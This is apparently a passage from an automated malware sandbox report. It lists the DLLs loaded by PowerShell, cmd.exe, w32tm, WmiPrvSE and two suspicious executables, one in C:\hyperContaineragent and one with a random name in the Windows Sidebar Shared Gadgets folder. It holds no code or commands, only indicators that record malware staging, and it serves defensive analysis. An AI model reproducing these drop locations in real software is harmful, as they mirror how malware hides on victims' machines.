                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: mscoree.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: version.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: uxtheme.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.storage.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wldp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: profapi.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptsp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: rsaenh.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptbase.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sspicli.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: mscoree.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: version.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: uxtheme.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.storage.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wldp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: profapi.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptsp.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: rsaenh.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptbase.dll
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
